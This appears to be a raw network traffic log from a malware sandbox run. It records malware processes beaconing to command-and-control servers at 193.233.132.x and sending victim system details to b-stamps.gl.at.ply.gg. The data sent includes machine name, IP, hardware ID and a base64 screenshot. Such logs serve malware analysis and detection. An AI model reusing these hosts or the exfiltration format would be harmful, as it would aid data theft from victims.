                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.227665901 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      933192.168.2.550783193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.235085011 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.489460945 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      934192.168.2.550784147.185.221.19309465608C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.340714931 CEST224OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95713
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.976345062 CEST1289OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95713
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000187001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>iVBORw0KGgoAAAANSUhEUgAABQAAAAQACAYAAAC+k/RDAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAKNcSURBVHhe7P1/eBz3feB57h93t3vnZ57dm9vb3dlnb7m63Z293M7tbvYws57l/vAoHts8a1e0Mxk4kYSMnFC2M4wcm5btQFFiJJbCSLItxTKcRMLEieixEliyAtkZg4ktWBaDSE4gUhYkWYR+gpZoyBQFkRLBX/pcfauqge5GoQCQAIluvt7P85oI6O7qquqG5PpMVfe/FZIkSZIkSZK6NgNASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZ
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:18.843758106 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      935192.168.2.550785147.185.221.19309467324C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.341315985 CEST224OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95714
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.984699011 CEST1289OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95714
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000188001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>iVBORw0KGgoAAAANSUhEUgAABQAAAAQACAYAAAC+k/RDAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAKNcSURBVHhe7P1/eBz3feB57h93t3vnZ57dm9vb3dlnb7m63Z293M7tbvYws57l/vAoHts8a1e0Mxk4kYSMnFC2M4wcm5btQFFiJJbCSLItxTKcRMLEieixEliyAtkZg4ktWBaDSE4gUhYkWYR+gpZoyBQFkRLBX/pcfauqge5GoQCQAIluvt7P85oI6O7qquqG5PpMVfe/FZIkSZIkSZK6NgNASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZIkSZK6OANASZIkSZIkqYszAJQkSZ
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:18.847451925 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:18 GMT
                                                                                                                                                                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      936192.168.2.550786193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.588253021 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.830483913 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      937192.168.2.550787193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:16.853645086 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:17.100564957 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      938192.168.2.550788193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:17.081065893 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:17.327124119 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      939192.168.2.550789193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:17.354295015 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
